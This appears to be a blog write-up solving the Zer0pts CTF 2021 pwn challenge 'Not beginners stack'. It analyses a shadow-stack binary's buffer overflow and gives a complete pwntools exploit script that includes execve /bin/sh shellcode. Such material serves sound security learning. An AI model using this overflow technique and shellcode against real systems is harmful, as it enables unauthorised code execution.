<!DOCTYPE html>
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,100..900;1,100..900&display=swap" rel="stylesheet">
<html lang="en"><head>
  <meta charset="utf-8" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  

  <title>
    
      Not beginners stack
    
  </title>

  <!-- Begin Jekyll SEO tag v2.6.1 -->
<meta name="generator" content="Jekyll v4.4.1" />
<meta property="og:title" content="Not beginners stack" />
<meta name="author" content="David Fernandez" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="WNKKKNW WXxc&#39;...&#39;:d0NW W0d:..&#39;cxxdl,..&#39;cx0N NOo;..,lOXW WKkl,..,cxKW WXkl&#39;..;o0N NKxc,..,lkXW WKxc&#39;..:xKW N0xc&#39;..;okXW N0d;..&#39;lkXW N0dc&#39;..:oOXW NOo,..,oON WNOd:&#39;.&#39;:xX Kl&#39;..;d0N WXx&#39; .dW Wo &#39;xX WKxc&#39;..c0 Ko;..,cxKN W0d:..&#39;ckXW WKkl,..,lxKW NOo,..,lON W0l. .,lkKW WXkl&#39;.. .:xKN N0d;..&#39;cl:&#39;..;okXW WKxc...:dOOd:&#39;..,lxKW NOo,..,lONW WXOo:...;oOXW N0d;...cxKW WXOo:...:0W WO,..;d0N WXOo;...;ok0ko,..,lOXW Xx&#39; .dW Wx. &#39;o0N WXkl;.....;o0N WXkl,..:xX W0d:&#39;.,cx0N WKOkOKW WKx:..&#39;ckXW WXOo:&#39;.,cxKN N0d;. .cON W0l. ..,lkKW WNOl,..,,..&#39;cd0N N0o;..&#39;ckOxc&#39;..,lkKW WKxc&#39;..:xKWWKxl,..,cx0N WOl,..;oON N0dc&#39;..;lkKW WKd:..&#39;ckXW NKxc. .oN Wx. &#39;o0N WNOd:&#39;..;lol;..,oON WXOl..&#39;xW 0:..;oOXW WXOo:&#39;.&#39;:d0N WXxc&#39;.&#39;ckXW WKxc,.&#39;:oOXW WNNNW WKd:..,oON N0xc,.&#39;:d0N N0o;..;d0N WN0d:&#39;.&#39;cd0N WXkl,.&#39;:xKW WN0d:&#39;.,cx0N WKxc&#39;.&#39;lkXW WXOo:&#39;.,cxKNWN0d:..,oONW WXOo;&#39;.,;,..;d0N WXOdookKW" />
<meta property="og:description" content="WNKKKNW WXxc&#39;...&#39;:d0NW W0d:..&#39;cxxdl,..&#39;cx0N NOo;..,lOXW WKkl,..,cxKW WXkl&#39;..;o0N NKxc,..,lkXW WKxc&#39;..:xKW N0xc&#39;..;okXW N0d;..&#39;lkXW N0dc&#39;..:oOXW NOo,..,oON WNOd:&#39;.&#39;:xX Kl&#39;..;d0N WXx&#39; .dW Wo &#39;xX WKxc&#39;..c0 Ko;..,cxKN W0d:..&#39;ckXW WKkl,..,lxKW NOo,..,lON W0l. .,lkKW WXkl&#39;.. .:xKN N0d;..&#39;cl:&#39;..;okXW WKxc...:dOOd:&#39;..,lxKW NOo,..,lONW WXOo:...;oOXW N0d;...cxKW WXOo:...:0W WO,..;d0N WXOo;...;ok0ko,..,lOXW Xx&#39; .dW Wx. &#39;o0N WXkl;.....;o0N WXkl,..:xX W0d:&#39;.,cx0N WKOkOKW WKx:..&#39;ckXW WXOo:&#39;.,cxKN N0d;. .cON W0l. ..,lkKW WNOl,..,,..&#39;cd0N N0o;..&#39;ckOxc&#39;..,lkKW WKxc&#39;..:xKWWKxl,..,cx0N WOl,..;oON N0dc&#39;..;lkKW WKd:..&#39;ckXW NKxc. .oN Wx. &#39;o0N WNOd:&#39;..;lol;..,oON WXOl..&#39;xW 0:..;oOXW WXOo:&#39;.&#39;:d0N WXxc&#39;.&#39;ckXW WKxc,.&#39;:oOXW WNNNW WKd:..,oON N0xc,.&#39;:d0N N0o;..;d0N WN0d:&#39;.&#39;cd0N WXkl,.&#39;:xKW WN0d:&#39;.,cx0N WKxc&#39;.&#39;lkXW WXOo:&#39;.,cxKNWN0d:..,oONW WXOo;&#39;.,;,..;d0N WXOdookKW" />
<link rel="canonical" href="http://0.0.0.0:4000/2021/03/11/not-beginners-stack.html" />
<meta property="og:url" content="http://0.0.0.0:4000/2021/03/11/not-beginners-stack.html" />
<meta property="og:site_name" content="Litios Blog" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2021-03-11T00:00:00+01:00" />
<script type="application/ld+json">
{"headline":"Not beginners stack","url":"http://0.0.0.0:4000/2021/03/11/not-beginners-stack.html","datePublished":"2021-03-11T00:00:00+01:00","dateModified":"2021-03-11T00:00:00+01:00","mainEntityOfPage":{"@type":"WebPage","@id":"http://0.0.0.0:4000/2021/03/11/not-beginners-stack.html"},"author":{"@type":"Person","name":"David Fernandez"},"@type":"BlogPosting","description":"WNKKKNW WXxc&#39;...&#39;:d0NW W0d:..&#39;cxxdl,..&#39;cx0N NOo;..,lOXW WKkl,..,cxKW WXkl&#39;..;o0N NKxc,..,lkXW WKxc&#39;..:xKW N0xc&#39;..;okXW N0d;..&#39;lkXW N0dc&#39;..:oOXW NOo,..,oON WNOd:&#39;.&#39;:xX Kl&#39;..;d0N WXx&#39; .dW Wo &#39;xX WKxc&#39;..c0 Ko;..,cxKN W0d:..&#39;ckXW WKkl,..,lxKW NOo,..,lON W0l. .,lkKW WXkl&#39;.. .:xKN N0d;..&#39;cl:&#39;..;okXW WKxc...:dOOd:&#39;..,lxKW NOo,..,lONW WXOo:...;oOXW N0d;...cxKW WXOo:...:0W WO,..;d0N WXOo;...;ok0ko,..,lOXW Xx&#39; .dW Wx. &#39;o0N WXkl;.....;o0N WXkl,..:xX W0d:&#39;.,cx0N WKOkOKW WKx:..&#39;ckXW WXOo:&#39;.,cxKN N0d;. .cON W0l. ..,lkKW WNOl,..,,..&#39;cd0N N0o;..&#39;ckOxc&#39;..,lkKW WKxc&#39;..:xKWWKxl,..,cx0N WOl,..;oON N0dc&#39;..;lkKW WKd:..&#39;ckXW NKxc. .oN Wx. &#39;o0N WNOd:&#39;..;lol;..,oON WXOl..&#39;xW 0:..;oOXW WXOo:&#39;.&#39;:d0N WXxc&#39;.&#39;ckXW WKxc,.&#39;:oOXW WNNNW WKd:..,oON N0xc,.&#39;:d0N N0o;..;d0N WN0d:&#39;.&#39;cd0N WXkl,.&#39;:xKW WN0d:&#39;.,cx0N WKxc&#39;.&#39;lkXW WXOo:&#39;.,cxKNWN0d:..,oONW WXOo;&#39;.,;,..;d0N WXOdookKW","@context":"https://schema.org"}</script>
<!-- End Jekyll SEO tag -->

  <link type="application/atom+xml" rel="alternate" href="http://0.0.0.0:4000/feed.xml" title="Litios Blog" />

  <link rel="shortcut icon" type="image/x-icon" href="/./logo.ico" />
  <link rel="stylesheet" href="http://0.0.0.0:4000/assets/css/main.css" />
  <link href="https://fonts.googleapis.com/icon?family=Material+Icons"
      rel="stylesheet">
</head>
<body a="light" style="color: #f2f2f2">
    <main class="page-content" aria-label="Content">
        <div class="w">
            <div style="display: flex; justify-content: space-between;">
<a style="font-size: 2em;" href="http://0.0.0.0:4000">..</a>
<span onClick="if (document.body.style.color != 'rgb(242, 242, 242)'){
document.body.style.color = '#f2f2f2'; document.body.style.backgroundColor = '#202324';
} else {
document.body.style.color = 'black'; document.body.style.backgroundColor = 'white';
}
" class="material-icons" style="
    cursor: pointer;
    display:flex;
    flex-direction:column;
    justify-content:end;
    align-items:center;
">visibility</span>
</div>
<br><br><br>
<pre style="font-size: 0.5vw; text-align: center"> 
                                    WNKKKNW                                     
                                 WXxc'...':d0NW                                 
                              W0d:..'cxxdl,..'cx0N                              
                           NOo;..,lOXW    WKkl,..,cxKW                          
                       WXkl'..;o0N            NKxc,..,lkXW                      
                    WKxc'..:xKW                   N0xc'..;okXW                  
                 N0d;..'lkXW                          N0dc'..:oOXW              
              NOo,..,oON                                 WNOd:'.':xX            
            Kl'..;d0N                                        WXx' .dW           
           Wo  'xX                                         WKxc'..c0            
            Ko;..,cxKN                                  W0d:..'ckXW             
              WKkl,..,lxKW                           NOo,..,lON                 
                  W0l.  .,lkKW                   WXkl'..  .:xKN                 
                N0d;..'cl:'..;okXW            WKxc...:dOOd:'..,lxKW             
             NOo,..,lONW WXOo:...;oOXW     N0d;...cxKW    WXOo:...:0W           
           WO,..;d0N         WXOo;...;ok0ko,..,lOXW           Xx' .dW           
           Wx. 'o0N              WXkl;.....;o0N           WXkl,..:xX            
            W0d:'.,cx0N              WKOkOKW           WKx:..'ckXW              
               WXOo:'.,cxKN                         N0d;. .cON                  
                  W0l.  ..,lkKW                 WNOl,..,,..'cd0N                
               N0o;..'ckOxc'..,lkKW          WKxc'..:xKWWKxl,..,cx0N            
            WOl,..;oON     N0dc'..;lkKW   WKd:..'ckXW       NKxc. .oN           
           Wx. 'o0N           WNOd:'..;lol;..,oON           WXOl..'xW           
            0:..;oOXW             WXOo:'.':d0N           WXxc'.'ckXW            
             WKxc,.':oOXW             WNNNW           WKd:..,oON                
                 N0xc,.':d0N                       N0o;..;d0N                   
                    WN0d:'.'cd0N               WXkl,.':xKW                      
                        WN0d:'.,cx0N        WKxc'.'lkXW                         
                            WXOo:'.,cxKNWN0d:..,oONW                            
                                WXOo;'.,;,..;d0N                                
                                    WXOdookKW                                   

</pre>

<hr />

<p>This was a really cool pwn challenge from the Zer0pts CTF 2021 rated with 81 points. The description said:</p>

<blockquote>
  <p>Elementary pwners love to overwrite the return address. This time you can’t!</p>
</blockquote>

<hr />

<h2 id="first-look">First look</h2>

<p>They gave us 3 files: the binary, a .S file and a markdown file.</p>

<p>Let’s start with the markdown file:</p>

<p>They told us that they are using their own stack to handle the return addresses of the calls so you can’t make a buffer overflow and redirect the execution. They implemented to macros for the <code class="language-plaintext highlighter-rouge">call</code> and <code class="language-plaintext highlighter-rouge">ret</code> instructions:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>%macro call 1
;; __stack_shadow[__stack_depth++] = return_address;
  mov ecx, [__stack_depth]
  mov qword [__stack_shadow + rcx * 8], %%return_address
  inc dword [__stack_depth]
;; goto function
  jmp %1
  %%return_address:
%endmacro

%macro ret 0
;; goto __stack_shadow[--__stack_depth];
  dec dword [__stack_depth]
  mov ecx, [__stack_depth]
  jmp qword [__stack_shadow + rcx * 8]
%endmacro
</code></pre></div></div>

<p>So it looks like the <code class="language-plaintext highlighter-rouge">__stack_depth</code> is storing how many inner calls have happened so it can put the return address correctly in the <code class="language-plaintext highlighter-rouge">__stack_shadow</code>, which is where this stack really is.</p>

<p>Okey, let’s take a look at the .S file:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>global _start
section .text

%macro call 1
;; __stack_shadow[__stack_depth++] = return_address;
  mov ecx, [__stack_depth]
  mov qword [__stack_shadow + rcx * 8], %%return_address
  inc dword [__stack_depth]
;; goto function
  jmp %1
  %%return_address:
%endmacro

%macro ret 0
;; goto __stack_shadow[--__stack_depth];
  dec dword [__stack_depth]
  mov ecx, [__stack_depth]
  jmp qword [__stack_shadow + rcx * 8]
%endmacro

_start:
  call notvuln
  call exit

notvuln:
;; char buf[0x100];
  enter 0x100, 0
;; vuln();
  call vuln
;; write(1, "Data: ", 6);
  mov edx, 6
  mov esi, msg_data
  xor edi, edi
  inc edi
  call write
;; read(0, buf, 0x100);
  mov edx, 0x100
  lea rsi, [rbp-0x100]
  xor edi, edi
  call read
;; return 0;
  xor eax, eax
  ret

vuln:
;; char buf[0x100];
  enter 0x100, 0
;; write(1, "Data: ", 6);
  mov edx, 6
  mov esi, msg_data
  xor edi, edi
  inc edi
  call write
;; read(0, buf, 0x1000);
  mov edx, 0x1000               ; [!] vulnerability
  lea rsi, [rbp-0x100]
  xor edi, edi
  call read
;; return;
  leave
  ret

read:
  xor eax, eax
  syscall
  ret

write:
  xor eax, eax
  inc eax
  syscall
  ret

exit:
  mov eax, 60
  syscall
  hlt
  
section .data
msg_data:
  db "Data: "
__stack_depth:
  dd 0

section .bss
__stack_shadow:
  resb 1024
</code></pre></div></div>

<p>It is the assembly code from the binary and also the function C code in comments, let’s organize that:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nl">notvuln:</span>
    <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mh">0x100</span><span class="p">];</span>
    <span class="n">vuln</span><span class="p">();</span>
    <span class="n">write</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="s">"Data: "</span><span class="p">,</span> <span class="mi">6</span><span class="p">);</span>
    <span class="n">read</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="mh">0x100</span><span class="p">);</span>
    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>

<span class="n">vuln</span><span class="o">:</span>
    <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mh">0x100</span><span class="p">];</span>
    <span class="n">write</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="s">"Data: "</span><span class="p">,</span> <span class="mi">6</span><span class="p">);</span>
    <span class="n">read</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="mh">0x1000</span><span class="p">);</span>
    <span class="k">return</span><span class="p">;</span>
</code></pre></div></div>

<p>We can clearly see that the vuln function is expecting 0x100 bytes and reading 0x1000. Basic buffer overflow.</p>

<p>We can also see that the <code class="language-plaintext highlighter-rouge">__stack_depth</code> is in the <code class="language-plaintext highlighter-rouge">.data</code> section and the <code class="language-plaintext highlighter-rouge">__stack_shadow</code> is in the <code class="language-plaintext highlighter-rouge">.bss</code> section.</p>

<p>Let’s look at the binary now:</p>

<p><img src="/./assets/imgs/not-beginner-sec.png" alt="Security" /></p>

<p>Okey so no protections at all. That looks cool.</p>

<h2 id="developing-the-attack">Developing the attack</h2>

<p>We know where to start. The vuln function is reading 0x1000 bytes and the array is 0x100 so there we can overflow BUT the return address is not in the usual stack, it is in the handcrafted one so the only thing we can do here is override the <code class="language-plaintext highlighter-rouge">rbp</code>.</p>

<p>If we check the <code class="language-plaintext highlighter-rouge">not-vuln</code> function, we can see that the address where it puts the data we enter is referenced through the rbp:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>  lea rsi, [rbp-0x100]
  xor edi, edi
  call read
</code></pre></div></div>

<p>Now we know that we can write 0x100 bytes wherever we want. As we saw in the beginning, we can check that the NX bit is not enabled so we can execute code in the stack.</p>

<p><img src="/./assets/imgs/not-beginner-sections.png" alt="Sections" /></p>

<p>So the goal is to put some shellcode in any place which is executable and redirect the execution there.</p>

<h2 id="putting-all-the-pieces-together">Putting all the pieces together</h2>

<p>The steps are:</p>

<ol>
  <li>Write shellcode</li>
  <li>Redirect execution to shellcode.</li>
</ol>

<p>We also know that:</p>

<ul>
  <li>We can write 0x100 bytes wherever we want</li>
  <li>There aren’t any security mechanisms (no PIE, NX bit, canary, etc)</li>
</ul>

<hr />

<p>In order to redirect the execution, we have to change the return address in the <code class="language-plaintext highlighter-rouge">__stack_shadow</code>, the handcrafted stack. We can start writing exactly where the return address of the <code class="language-plaintext highlighter-rouge">notvuln</code> function is.</p>

<p>That means we could return exactly where we will put the shellcode, because we have 0x100 bytes to send.</p>

<p>But we have a problem, as we saw before, the <code class="language-plaintext highlighter-rouge">.bss</code> is not executable and it has a length of 0x404, more that 0x100.</p>

<p>We also know that we can write 0x1000 on the <code class="language-plaintext highlighter-rouge">vuln</code> function. So first, we can redirect the execution there and then, because we control <code class="language-plaintext highlighter-rouge">rbp</code>, we can override the return address to point it to the shellcode and also write the shellcode in the <code class="language-plaintext highlighter-rouge">.bss</code>.</p>

<p>This looks promising!</p>

<h2 id="writing-the-exploit">Writing the exploit</h2>

<p>I used Python and Pwntools. First part, override the <code class="language-plaintext highlighter-rouge">rbp</code> variable with the buffer overflow so we write exactly where the return address is.</p>

<p><code class="language-plaintext highlighter-rouge">.bss</code> starts at 0x00600234, which is where the handcrafted stack is. The read function will decrement the address by 0x100 so we have to add that to our address: 0x00600334. Finally, the <code class="language-plaintext highlighter-rouge">__stack_depth</code> value. In the vuln function, the main function only called the vuln one so the value would be 1.</p>

<p>It multiplies the variable by 8 (<code class="language-plaintext highlighter-rouge">mov qword [__stack_shadow + rcx * 8], %%return_address</code>) so we have to add 8 * 1 to the address and that will result in: <code class="language-plaintext highlighter-rouge">0x0060033c</code></p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="n">pwn</span> <span class="kn">import</span> <span class="o">*</span>

<span class="c1">#p = process('./chall')
</span><span class="n">p</span> <span class="o">=</span> <span class="nf">remote</span><span class="p">(</span><span class="sh">"</span><span class="s">pwn.ctf.zer0pts.com</span><span class="sh">"</span><span class="p">,</span> <span class="mi">9011</span><span class="p">)</span>
<span class="n">offset</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">'</span><span class="s">A</span><span class="sh">'</span> <span class="o">*</span> <span class="mh">0x100</span>
<span class="n">p</span><span class="p">.</span><span class="nf">clean</span><span class="p">()</span>
<span class="n">first_exploit</span> <span class="o">=</span> <span class="n">offset</span> <span class="o">+</span> <span class="nf">p64</span><span class="p">(</span><span class="mh">0x0060033c</span><span class="p">)</span>
<span class="n">p</span><span class="p">.</span><span class="nf">sendline</span><span class="p">(</span><span class="n">first_exploit</span><span class="p">)</span>
</code></pre></div></div>

<p>Now, let’s write the address of the vuln function. We have to avoid the <code class="language-plaintext highlighter-rouge">enter 0x100, 0</code> because it will break our <code class="language-plaintext highlighter-rouge">rbp</code> so we will use the next address: <code class="language-plaintext highlighter-rouge">0x00400180</code></p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">p</span><span class="p">.</span><span class="nf">recv</span><span class="p">()</span>
<span class="n">second_exploit</span> <span class="o">=</span> <span class="nf">p64</span><span class="p">(</span><span class="mh">0x00400180</span><span class="p">)</span>
<span class="n">p</span><span class="p">.</span><span class="nf">sendline</span><span class="p">(</span><span class="n">second_exploit</span><span class="p">)</span>
<span class="n">p</span><span class="p">.</span><span class="nf">recv</span><span class="p">()</span>
</code></pre></div></div>

<p>And finally the last part. We will put the shellcode on 0x600740. We are writing on 0x0060023c so we need an offset of 0x504 (minus the 8 bytes from the address of the shellcode):</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">shellcode</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">"</span><span class="se">\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05</span><span class="sh">"</span>
<span class="n">offset2</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">'</span><span class="s">A</span><span class="sh">'</span> <span class="o">*</span> <span class="p">(</span><span class="mh">0x4fc</span><span class="p">)</span>
<span class="n">third_exploit</span> <span class="o">=</span> <span class="nf">p64</span><span class="p">(</span><span class="mh">0x600740</span><span class="p">)</span> <span class="o">+</span> <span class="n">offset2</span> <span class="o">+</span> <span class="n">shellcode</span>
<span class="n">p</span><span class="p">.</span><span class="nf">sendline</span><span class="p">(</span><span class="n">third_exploit</span><span class="p">)</span>
<span class="n">p</span><span class="p">.</span><span class="nf">interactive</span><span class="p">()</span>
</code></pre></div></div>

<p>And we got it!</p>

<p><img src="/./assets/imgs/not-beginner-solved.png" alt="Sections" /></p>


        </div>
    </main>

    
    </body>
</html>